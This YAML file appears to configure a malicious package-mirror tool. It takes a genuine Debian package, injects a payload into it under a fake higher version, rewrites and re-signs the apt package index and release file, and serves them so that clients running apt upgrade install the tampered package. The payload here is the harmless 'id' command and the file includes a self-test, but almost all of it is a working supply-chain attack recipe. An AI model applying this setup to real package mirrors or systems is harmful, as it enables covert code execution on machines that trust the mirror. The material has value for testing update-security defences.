---

upstreams:
  debian:
    url: https://deb.debian.org/

signing_keys:
  apt:
    type: pgp
    uids: ["Debian Archive Automatic Signing Key (11/bullseye) <ftpmaster@debian.org>"]

artifacts:
  release_upstream:
    type: url
    url: https://deb.debian.org/debian/dists/stable/InRelease
  index_upstream:
    type: url
    url: https://deb.debian.org/debian/dists/stable/main/binary-amd64/Packages.xz
  pkg_upstream:
    type: url
    url: https://deb.debian.org/debian/pool/main/l/lsb/lsb-base_11.1.0_all.deb
    sha256: 89ed6332074d827a65305f9a51e591dff20641d61ff5e11f4e1822a9987e96fe

  pkg_infected:
    type: infect
    infect: deb
    artifact: pkg_upstream
    payload: id
  index_patched:
    type: tamper
    tamper: patch-apt-package-list
    artifact: index_upstream
    compression: none
    patch:
      - name: lsb-base
        artifact: pkg_infected
        set:
          Version:
            - 11.1337.0
          Filename:
            - pool/main/l/lsb/lsb-base_11.1337.0_all.deb
  index_patched_gz:
    type: compress
    compression: gzip
    artifact: index_patched
  index_patched_xz:
    type: compress
    compression: xz
    artifact: index_patched
  release_patched:
    type: tamper
    tamper: patch-apt-release
    artifact: release_upstream
    signing_key: apt
    patch:
      - name: main/binary-amd64/Packages
        artifact: index_patched
      - name: main/binary-amd64/Packages.gz
        artifact: index_patched_gz
      - name: main/binary-amd64/Packages.xz
        artifact: index_patched_xz

check:
  image: debian:stable
  install_keys:
    - key: apt
      binary: true
      cmd: 'tee /etc/apt/trusted.gpg.d/pwn.gpg > /dev/null'
  cmds:
    - 'echo "deb http://${SH4D0WUP_BOUND_ADDR}/debian stable main" | tee /etc/apt/sources.list'
    - 'echo "deb http://${SH4D0WUP_BOUND_ADDR}/debian-security stable-security main" | tee -a /etc/apt/sources.list'
    - 'echo "deb http://${SH4D0WUP_BOUND_ADDR}/debian stable-updates main" | tee -a /etc/apt/sources.list'
    - ["apt-get", "update"]
    - ["env", "DEBIAN_FRONTEND=noninteractive", "apt-get", "upgrade", "-y"]

routes:
  - path: /debian/dists/stable/InRelease
    type: static
    args:
      artifact: release_patched

  - type: static
    args:
      path_template: "/debian/dists/stable/main/binary-amd64/by-hash/SHA256/{{sha256}}"
      artifacts:
        - index_patched
        - index_patched_gz
        - index_patched_xz
        - pkg_infected

  - path: /debian/dists/stable/main/binary-amd64/Packages
    type: static
    args:
      artifact: index_patched
  - path: /debian/dists/stable/main/binary-amd64/Packages.gz
    type: static
    args:
      artifact: index_patched_gz
  - path: /debian/dists/stable/main/binary-amd64/Packages.xz
    type: static
    args:
      artifact: index_patched_xz

  - path: /debian/pool/main/l/lsb/lsb-base_11.1337.0_all.deb
    type: static
    args:
      artifact: pkg_infected

  - type: proxy
    args:
      upstream: debian